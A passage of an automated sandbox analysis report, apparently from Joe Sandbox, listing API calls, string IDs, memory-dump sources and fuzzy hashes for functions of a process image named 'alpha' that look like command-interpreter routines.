  • Part of subcall function 00EF589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF58CD
  • Part of subcall function 00EE8B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00F099FD,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE8B7B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
• String ID: \\.\
• API String ID: 799470305-2900601889
• Opcode ID: 1f191ff292be2a2d5489ed9f270d40e6ad02691173f302d18c83676c3e738634
• Instruction ID: 259d1703d9450c2c2615bc02e72f3fcd922990a284261fb463f9a0df76882094
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f191ff292be2a2d5489ed9f270d40e6ad02691173f302d18c83676c3e738634
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A5169716083899BC734DF71988857B7AE8EF44354F04182AF9A9E3281EB70CC058763
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace$_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3089800946-2256444845
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a370be1cad0cdaf3eef36074a73d023c160abf91949daf434e13517681e574fe
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 14fdcc541be619d44ca99f664ba49433502ea11a711cfdc3b42e035e83a6c760
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a370be1cad0cdaf3eef36074a73d023c160abf91949daf434e13517681e574fe
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7315D31A0136C47CB308F66AC497AE7BA6AF55309F141069EE09F3122F7319D65CB93
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C0F8: free.MSVCRT ref: 00F0C116
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C0F8: free.MSVCRT ref: 00F0C123
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,00000000,?,00000000), ref: 00F0BB97
                                                                                                                                                                                                                                                                                                                                                      • qsort.MSVCRT ref: 00F0BC1A
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0BC6F
                                                                                                                                                                                                                                                                                                                                                      • calloc.MSVCRT ref: 00F0BCB1
                                                                                                                                                                                                                                                                                                                                                      • calloc.MSVCRT ref: 00F0BD82
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0BDCB
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?), ref: 00F0BE1D
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?), ref: 00F0BE3E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                                                                                                                                                                                                                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 975110957-381716982
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bcb4cd717cfa758d84b2e98f68e5be4b7a327f66b68c833c7b04a17f8872e352
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec95e17ba3bfd16b0681e1a9b1aeb60c4e74c857348c9bfc38f9973ec09a7b85
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcb4cd717cfa758d84b2e98f68e5be4b7a327f66b68c833c7b04a17f8872e352
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3C1B072E042199BDB248F68DC41BAEB7B1FF48720F24406DE948E7382DB309D41EB54
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _tell.MSVCRT ref: 00EEB7F9
                                                                                                                                                                                                                                                                                                                                                      • _close.MSVCRT ref: 00EEB82C
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEB8CC
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00EEB936
                                                                                                                                                                                                                                                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EEB947
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EEB96D
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleInfoOutput_close_tellmemset
• String ID: GOTO
• API String ID: 1380661413-1693823284
• Opcode ID: ee890d4c3d88c79697fae7d21fd000b0d64b18b5118dbc6d1bd2f658a3a82e97
• Instruction ID: 06275b84ba1bcf5d3c8c06331f3e43d02540dc51f209386a43021af74a7ffe45
• Opcode Fuzzy Hash: ee890d4c3d88c79697fae7d21fd000b0d64b18b5118dbc6d1bd2f658a3a82e97
• Instruction Fuzzy Hash: 21B1F030A0438D8BDB24DF26D94476BB3E5AF84308F24292DE985A7391EB71DC45DB92
APIs
• memset.MSVCRT ref: 00EE9F3A
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• _get_osfhandle.MSVCRT ref: 00EEA02D
• _get_osfhandle.MSVCRT ref: 00EEA03F
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 00EEA0E8
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: _get_osfhandlememset
• String ID: DPATH${
• API String ID: 3784859044-4055172290
• Opcode ID: 074aaf9a2f9b9d335b23825939e0e4626a7a786cad3fb252b2cad6a18a5acc57
• Instruction ID: df5b1dc6eded4075161046b70f25b5259ebd544966aedde704acb73dab9b2be1
• Opcode Fuzzy Hash: 074aaf9a2f9b9d335b23825939e0e4626a7a786cad3fb252b2cad6a18a5acc57
• Instruction Fuzzy Hash: ADA13470A0014D9BC734AF75CC4497AB7E5EF88324B28A66DE556B32D1EB30EC41DB51
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00F06745
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00F067CF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F067F6
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00EE20B8,00000000,00000002,?,00000000), ref: 00F06867
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00F068A3
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F068C5
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CloseValue$CreateDeleteOpen
• String ID: %s=%s$\Shell\Open\Command$p~]u
• API String ID: 4081037667-3093970171
• Opcode ID: c4cb2bfda53304cbf948d74ad4b971bb67d77c0e441f8ef5a766e95a89c77d23
• Instruction ID: fe6cf67659404a1c3c5e1632dcc64868d3d9722f45caea11b7d315f628e187eb
• Opcode Fuzzy Hash: c4cb2bfda53304cbf948d74ad4b971bb67d77c0e441f8ef5a766e95a89c77d23
• Instruction Fuzzy Hash: 62613871E001299BDF349B24CC49BBBB7F8EF54710F0441A9E849E72C0EA318E51EAA1
APIs
• towupper.MSVCRT ref: 00F07277
• iswalpha.MSVCRT ref: 00F072AA
• towupper.MSVCRT ref: 00F072BD
• GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00F072EF
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F07304
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F07311
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ErrorLasttowupper$InformationVolumeiswalpha
• String ID: $%04X-%04X$\
• API String ID: 4001382275-467840296
• Opcode ID: 9b08af853dcb11a807b2ac36a081a55655a3f05cd2d9bf8f73b404de928ba13b
• Instruction ID: 9a5acdc61b9a61ad7e721ecebb74168126d1b5e4a0d175d0cff164fb7d6f615c
• Opcode Fuzzy Hash: 9b08af853dcb11a807b2ac36a081a55655a3f05cd2d9bf8f73b404de928ba13b
• Instruction Fuzzy Hash: 7A41E872A04354ABE730BBA19C0AFBB73E8EF94B50F04045DF949D61C1E670A941F7A2
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F0650F
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00), ref: 00F06545
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F06553
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F06590
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F065AD
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00EE20B8,?,00000000,02000000,?,?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F065D4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F065EF
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s=%s$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1019019434-85233260
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9c848cae394e507e0325a15d999345459857ed28f7b6888997a0930f38ea2b18
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 485d9692a5bfcc75a117924bd0812dd066ff4c2c9bf7c19fbc61f0a64f8dd026
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c848cae394e507e0325a15d999345459857ed28f7b6888997a0930f38ea2b18
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6841B272D00269ABDB359B559C09FBF7BB8EB85B60F040119F805B72D4D6264E12FAB0
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00F03877), ref: 00F02D31
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                      • String ID: wil
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7aee8a7b3fb474f3e048f16bcf36d0df5939a955471f3d7fef5be74724b62090
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7abbd9ca94d239f8efa4860b0abed7f5529760d542e1f60a31fbb7d1bca28bc3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aee8a7b3fb474f3e048f16bcf36d0df5939a955471f3d7fef5be74724b62090
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75319131B45209EBEB609B65CC8CBAB366EEF41361F604035F902DA2D1E774CD42B672
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00F08360
                                                                                                                                                                                                                                                                                                                                                      • _ultoa.MSVCRT ref: 00F08376
                                                                                                                                                                                                                                                                                                                                                      • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00F0838B
                                                                                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00F083A0
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00F083D8
                                                                                                                                                                                                                                                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00F0840C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                      • String ID: (#$Application$System
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3377411628-593978566
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3d0018ac9683d476e37ec6de10f48114dcd8a32c76ff2c11bc5cb9c8472fabfb
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ceddd311282348c40cbd3f7f3f1b7db0e220e28b5c13c3d02fca22ca42e5f3ab
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d0018ac9683d476e37ec6de10f48114dcd8a32c76ff2c11bc5cb9c8472fabfb
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E314B71A0020CABDB20DFB5DC45DAEBBB9EB88B50F105129F911E7191EB309A06DF61
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00EF5294
                                                                                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00EF52A4
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01036
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01048
                                                                                                                                                                                                                                                                                                                                                      • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01064
                                                                                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01073
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
• API String ID: 3961617410-1166558509
APIs
• memset.MSVCRT ref: 00EF1665
• memset.MSVCRT ref: 00EF1689
• memset.MSVCRT ref: 00EF16AD
• memset.MSVCRT ref: 00EF16D1
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF17CF
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF17E9
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF1801
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF1813
  • Part of subcall function 00EF260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EF2650
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
Similarity
• API ID: memset$BufferConsoleInfoScreen
• String ID:
• API String ID: 1034426908-0
APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00F09E02,?,?,00F09E02), ref: 00F04618
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F04637
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F1A7F0,00F09E02,?,00000000,?,00F09E02), ref: 00F04646
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F04653
• memcmp.MSVCRT(00F1A7F0,00EE34F8,00000003), ref: 00F04693
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00F09E02,00000000,?,00F09E02,?,00F09E02), ref: 00F04720
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00F09E02,00000000,00000000,?,00F09E02), ref: 00F04742
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F0474F
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F1,00000001,?,00000000,?,00F09E02), ref: 00F04764
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F04771
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
Similarity
• API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
• String ID:
• API String ID: 2002953238-0
APIs
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,00F1A7F0,00000000,?,00000200), ref: 00EEC818
• wcschr.MSVCRT ref: 00EEC882
• _get_osfhandle.MSVCRT ref: 00EEC8BA
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EEC8C4
• _get_osfhandle.MSVCRT ref: 00EEC8DB
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EEC8ED
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00EEC90D
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EEC91E
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F1A7F0,00000200,00000000,00000000), ref: 00EEC934
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EEC941
• _get_osfhandle.MSVCRT ref: 00EECAC4
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EECACE
• memcmp.MSVCRT(00F1A7F0,00EE34F8,00000003), ref: 00EFD16E
